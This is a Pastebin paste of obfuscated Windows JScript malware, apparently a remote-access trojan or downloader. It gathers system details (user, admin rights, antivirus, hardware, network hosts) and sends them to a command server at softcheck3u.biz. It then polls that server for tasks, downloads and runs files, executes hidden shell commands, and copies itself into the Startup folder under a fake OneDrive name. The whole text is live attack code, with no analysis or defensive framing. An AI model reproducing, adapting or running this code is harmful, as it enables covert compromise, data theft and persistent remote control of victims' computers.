Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function anonymous() {
- function _$af1831293() {
- var response;
- try {
- var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
- var temp = WinHttpReq.Open("POST", server, false);
- WinHttpReq.SetRequestHeader("Content-Type", "application/json");
- WinHttpReq.SetRequestHeader("mode", "info");
- WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
- WinHttpReq.SetRequestHeader("version", version);
- WinHttpReq.Send(JSON.stringify(clientInfo));
- WinHttpReq.WaitForResponse();
- response = WinHttpReq.ResponseText;
- } catch (objError) {
- response = objError + "\n";
- response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
- response += objError.description;
- }
- return response;
- }
- function _$af1831294() {
- var response;
- if (_$af1831301 == true) {
- return;
- }
- try {
- var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
- var temp = WinHttpReq.Open("POST", server, false);
- if (_$af1831299 === null) {
- return;
- }
- WinHttpReq.SetRequestHeader("Accept", "application/json");
- WinHttpReq.SetRequestHeader("mode", "knock");
- WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
- WinHttpReq.SetRequestHeader("version", version);
- WinHttpReq.Send();
- WinHttpReq.WaitForResponse();
- response = WinHttpReq.ResponseText;
- } catch (objError) {
- if (!_$af1831298) {
- _$af1831303(null, null, null, 1, 0);
- }
- response = objError + "\n";
- response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
- response += objError.description;
- }
- if (_$af1831296 == 0) {
- _$af1831295 = 1;
- return;
- }
- return response;
- }
- if (_$af1831297 == null) {
- _$af1831302(false, null, 1);
- _$af1831295 = false;
- }
- function _$af1831295(taskID, result, details) {
- var response;
- try {
- var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
- var temp = WinHttpReq.Open("POST", server, false);
- WinHttpReq.SetRequestHeader("Accept", "application/json");
- WinHttpReq.SetRequestHeader("mode", "task");
- if (!_$af1831295) {
- _$af1831303 = 1;
- return;
- } else {
- WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
- }
- WinHttpReq.SetRequestHeader("taskID", taskID);
- WinHttpReq.SetRequestHeader("result", result);
- WinHttpReq.SetRequestHeader("details", details);
- WinHttpReq.Send();
- WinHttpReq.WaitForResponse();
- response = WinHttpReq.ResponseText;
- } catch (objError) {
- response = objError + "\n";
- response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
- response += objError.description;
- }
- }
- function _$af1831296(tasksJson) {
- if (tasksJson.length < 5) {
- if (_$af1831299 == true) {
- return;
- }
- return;
- }
- var result = "False";
- var attempts = 0;
- var details = "";
- try {
- tasks = JSON.parse(tasksJson);
- } catch (err) {
- return;
- }
- if (!_$af1831302) {
- _$af1831298 = 1;
- } else {
- for (var task in tasks) {
- result = "False";
- attempts = attemptsCount;
- details = "";
- if (_$af1831296 === 1) {
- return;
- } else {
- while (attempts > 0 && result != "True") {
- if (_$af1831298 === 0) {
- _$af1831295();
- return;
- }
- switch (tasks[task].type) {
- case "Download & Execute":
- result = _$af1831299(tasks[task].content);
- if (result == "False") {
- details = "Error: download or executing file failed";
- }
- break;
- case "Execute":
- result = _$af1831297(tasks[task].content);
- if (result == "False") {
- details = "Error: executing file failed";
- }
- if (!_$af1831296) {
- _$af1831299();
- _$af1831303 = 1;
- return;
- }
- break;
- case "Terminate":
- status = "Stopped";
- if (!_$af1831303) {
- _$af1831299();
- _$af1831301 = false;
- }
- result = "True";
- if (!_$af1831299) {
- _$af1831298(null);
- return;
- }
- break;
- default:
- result = "False";
- details = "Error: unknown task type";
- break;
- }
- if (result == "False") {
- attempts--;
- } else {
- if (!_$af1831294) {
- _$af1831302();
- } else {
- details = "Success";
- }
- }
- _$af1831295(tasks[task].id, result, details);
- }
- }
- }
- }
- }
- function _$af1831297(command) {
- try {
- shellObj.run("%comspec% /c " + command, 0, true);
- return "True";
- } catch (err) {
- return "False";
- }
- }
- function _$af1831298(url) {
- var filename = url.split("/")[url.split("/").length - 1];
- if (!_$af1831302) {
- return;
- } else {
- return filename;
- }
- }
- function _$af1831299(url) {
- var filename = _$af1831298(url);
- var saveTo = defaultPath + "\\" + filename;
- var WinHttpObj = WScript.CreateObject("WinHttp.WinHttpRequest.5.1");
- if (_$af1831300 == 1) {
- _$af1831293();
- }
- try {
- WinHttpObj.open("GET", url, false);
- if (!_$af1831302) {
- _$af1831295();
- }
- WinHttpObj.setRequestHeader("cache-control", "max-age=0");
- WinHttpObj.send();
- var fsObj = WScript.CreateObject("Scripting.FileSystemObject");
- if (fsObj.fileExists(saveTo)) {
- fsObj.deleteFile(saveTo);
- }
- if (WinHttpObj.status == 200) {
- var streamObj = WScript.CreateObject("ADODB.Stream");
- streamObj.Type = 1;
- if (!_$af1831293) {
- return;
- }
- streamObj.Open();
- streamObj.Write(WinHttpObj.responseBody);
- streamObj.SaveToFile(saveTo);
- streamObj.close();
- if (!_$af1831293) {
- return;
- }
- streamObj = null;
- }
- if (fsObj.fileExists(saveTo)) {
- shellObj.run(fsObj.getFile(saveTo).shortPath);
- return "True";
- }
- } catch (err) {
- return "False";
- }
- return "False";
- }
- if (!_$af1831295) {
- _$af1831299();
- _$af1831295 = 1;
- return;
- }
- function _$af1831300(command) {
- var fso = new ActiveXObject("Scripting.FileSystemObject");
- var wshShell = new ActiveXObject("WScript.Shell");
- do {
- var tempName = fso.BuildPath(fso.GetSpecialFolder(2), fso.GetTempName());
- } while (fso.FileExists(tempName));
- var cmdLine = fso.BuildPath(fso.GetSpecialFolder(1), "cmd.exe") + " /C " + command + " > \"" + tempName + "\"";
- wshShell.Run(cmdLine, 0, true);
- var result = "";
- try {
- var ts = fso.OpenTextFile(tempName, 1, false);
- result = ts.ReadAll();
- ts.Close();
- } catch (err) {
- }
- return result;
- }
- function _$af1831301() {
- var initInfo = new Object;
- try {
- var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
- for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct")); !i.atEnd(); i.moveNext()) {
- initInfo.uuid = i.item().UUID;
- }
- } catch (err) {
- initInfo.uuid = "N/A";
- }
- if (!_$af1831299) {
- _$af1831298 = null;
- }
- try {
- var ipReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
- ipReq.Open("GET", "http://ipinfo.io/ip", false);
- if (_$af1831303 === 1) {
- _$af1831303();
- }
- ipReq.Send();
- ipReq.WaitForResponse();
- ipRes = ipReq.ResponseText;
- initInfo.ip = ipRes.replace(/^\s+|\s+$/g, "");
- } catch (err) {
- initInfo.ip = "N/A";
- }
- try {
- var countryReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
- countryReq.Open("GET", "http://ipinfo.io/country", false);
- countryReq.Send();
- countryReq.WaitForResponse();
- countryRes = countryReq.ResponseText;
- initInfo.location = countryRes.replace(/^\s+|\s+$/g, "");
- } catch (err) {
- if (!_$af1831303) {
- return;
- }
- initInfo.location = "N/A";
- }
- if (_$af1831293 === null) {
- _$af1831300(0);
- _$af1831294 = false;
- }
- try {
- for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext()) {
- initInfo.os = i.item().Caption;
- }
- } catch (err) {
- if (_$af1831293 === 1) {
- _$af1831303 = null;
- }
- initInfo.os = "N/A";
- }
- try {
- var shellObj = new ActiveXObject("WScript.Shell");
- var netObj = new ActiveXObject("WScript.Network");
- if (!_$af1831301) {
- return;
- }
- initInfo.user = netObj.ComputerName + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%");
- } catch (err) {
- initInfo.user = "N/A";
- }
- try {
- initInfo.role = "User";
- var groupObj = GetObject("WinNT://" + netObj.UserDomain + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%"));
- for (propObj in groupObj.Members) {
- if (_$af1831293 === false) {
- _$af1831299(null);
- }
- if (propObj.Name == "Administrators") {
- if (!_$af1831299) {
- _$af1831299 = 0;
- return;
- }
- initInfo.role = "Admin";
- }
- }
- } catch (err) {
- initInfo.role = "N/A";
- }
- try {
- var wmiAV = GetObject("winmgmts:root\\SecurityCenter2");
- for (var i = new Enumerator(wmiAV.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext()) {
- if (!initInfo.antivirus) {
- initInfo.antivirus = i.item().displayName;
- }
- }
- } catch (err) {
- initInfo.antivirus = "N/A";
- }
- try {
- for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd(); i.moveNext()) {
- initInfo.cpu = i.item().Name;
- }
- } catch (err) {
- initInfo.cpu = "N/A";
- }
- if (!_$af1831300) {
- return;
- }
- try {
- if (_$af1831302 == null) {
- _$af1831297(0);
- _$af1831293 = 0;
- return;
- } else {
- for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_VideoController")); !i.atEnd(); i.moveNext()) {
- if (_$af1831295 == 1) {
- return;
- }
- initInfo.gpu = i.item().Name;
- }
- }
- } catch (err) {
- initInfo.gpu = "N/A";
- }
- try {
- var ramObj = WScript.CreateObject("Shell.Application");
- initInfo.ram = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 1048576) + " MB";
- } catch (err) {
- if (_$af1831301 === null) {
- _$af1831293(false, 1, 0);
- }
- initInfo.ram = "N/A";
- }
- if (_$af1831300 === true) {
- _$af1831300 = false;
- }
- try {
- var available = 0;
- var total = 0;
- for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext()) {
- if (_$af1831296 === null) {
- _$af1831299(null);
- _$af1831303 = null;
- }
- if (i.item().Size != null) {
- available += i.item().FreeSpace / 1024 / 1024 / 1024;
- total += i.item().Size / 1024 / 1024 / 1024;
- }
- }
- initInfo.storage = Math.round(available) + " / " + Math.round(total) + " GB";
- } catch (err) {
- initInfo.storage = "0 / 0 GB";
- }
- try {
- var pcs = 0;
- var output = _$af1831300("net view");
- var lines = output.split("\n");
- if (lines.length > 6) {
- pcs = lines.length - 6;
- }
- initInfo.network = pcs;
- } catch (err) {
- initInfo.network = "0";
- }
- if (_$af1831295 === null) {
- _$af1831298();
- _$af1831293 = null;
- return;
- }
- initInfo.version = version;
- return initInfo;
- }
- function _$af1831302() {
- try {
- startupPath = defaultPath + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\";
- fsObj = WScript.CreateObject("Scripting.FileSystemObject");
- fsObj.CopyFile(scriptFullPath, startupPath);
- } catch (err) {
- return;
- }
- }
- function _$af1831303() {
- var xObj = WSH.CreateObject("Microsoft.XMLHTTP"), fso = WSH.CreateObject("Scripting.FileSystemObject"), temp = WSH.CreateObject("WScript.Shell").Environment("Process")("temp"), j2li
- b = "https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js";
- if (_$af1831299 === null) {
- _$af1831301 = false;
- }
- if (fso.FileExists(temp + "\\json2.js")) {
- j2lib = fso.OpenTextFile(temp + "\\json2.js", 1);
- eval(j2lib.ReadAll());
- j2lib.Close();
- } else {
- with (xObj) {
- open("GET", j2lib, true);
- setRequestHeader("User-Agent", "XMLHTTP/1.0");
- send("");
- }
- while (xObj.readyState != 4) {
- WSH.Sleep(50);
- }
- eval(xObj.responseText);
- if (_$af1831301 === 1) {
- _$af1831303 = 0;
- return;
- }
- j2lib = fso.CreateTextFile(temp + "\\json2.js", true);
- j2lib.Write(xObj.responseText);
- j2lib.Close();
- }
- }
- SendClientInfo = _$af1831293;
- if (!_$af1831297) {
- return;
- }
- SendKnock = _$af1831294;
- SendTaskResult = _$af1831295;
- DoTasks = _$af1831296;
- Execute = _$af1831297;
- GetFilenameFromURL = _$af1831298;
- DownloadAndExecute = _$af1831299;
- ExecuteAndOutput = _$af1831300;
- GetClientInfo = _$af1831301;
- AddToAutorun = _$af1831302;
- if (_$af1831298 == null) {
- return;
- } else {
- ImportJSON = _$af1831303;
- }
- version = "Test7";
- if (_$af1831303 === null) {
- _$af1831299(null);
- return;
- }
- server = "https://softcheck3u.biz/inc/server/gate.php";
- interval = 181;
- attemptsCount = 5;
- status = "Active";
- if (_$af1831296 == false) {
- _$af1831295(false, null, null);
- _$af1831295 = true;
- }
- wss = new ActiveXObject("WScript.Shell");
- defaultPath = wss.ExpandEnvironmentStrings("%APPDATA%");
- scriptFullPath = WScript.ScriptFullName;
- scriptName = WScript.ScriptName;
- fakeAutorunName = "MicrosoftOneDrive";
- if (_$af1831301 == false) {
- _$af1831295();
- _$af1831302 = false;
- }
- shellObj = WScript.createObject("WScript.Shell");
- _$af1831303();
- clientInfo = _$af1831301();
- _$af1831302();
- while (status == "Active") {
- _$af1831296(_$af1831293());
- WScript.sleep(interval * 1000);
- _$af1831296(_$af1831294());
- }
- if (!_$af1831301) {
- _$af1831298();
- _$af1831300 = 1;
- return;
- } else {
- }
- if (!_$af1831293) {
- return;
- } else {
- }
- if (!_$af1831298) {
- _$af1831293(true);
- } else {
- }
- if (!_$af1831296) {
- _$af1831293(1);
- _$af1831301 = 1;
- }
- }
Add Comment
Please, Sign In to add comment